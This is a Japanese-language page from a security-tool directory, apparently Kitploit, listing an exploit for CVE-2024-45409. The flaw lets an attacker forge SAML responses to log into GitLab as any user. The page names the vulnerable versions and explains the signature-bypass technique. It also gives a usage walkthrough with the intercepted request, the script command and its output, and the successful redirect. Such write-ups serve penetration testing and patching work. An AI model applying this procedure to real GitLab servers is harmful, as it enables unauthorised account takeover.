Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-45409 — Ruby-SAML / GitLab 認証バイパス (CVE-2024-45409) エクスプロイト | Kitploit
ツール/GitHubGitHub/synacktiv/cve-2024-45409
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

Ruby-SAML / GitLab 認証バイパス (CVE-2024-45409) エクスプロイト

リポジトリを見る
84131年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Ruby-SAML / GitLab 認証バイパス (CVE-2024-45409) エクスプロイト

このスクリプトは CVE-2024-45409 を悪用します。この脆弱性により、IDP が発行した署名済み SAML 文書にアクセスできる未認証の攻撃者が、SAML Response/Assertion を偽造し、GitLab 上の任意のユーザーとしてアクセスできるようになります。

以下の GitLab (CE/EE) の全バージョンが脆弱です:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

このエクスプロイトは、変更した assertion の DigestValue を StatusDetail 要素に注入することで、SignedInfo ブロック内の値の代わりにこの値を使用する XPath セレクタを紛れ込ませることを可能にします。

必要条件

  • IDP が発行した有効な SAML Response

使用方法

root@kitploit:~
apt install python3-lxml

まず URL と Base64 エンコードされた IDP SAML レスポンスを傍受し、次にスクリプトを使用して XML コンテンツを変更します。

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64

その後、パラメータ SAMLResponse の値をスクリプトの出力と置き換えます。認証が成功すると、GitLab のホームページにリダイレクトされます。

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>

参照

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
ツールをダウンロード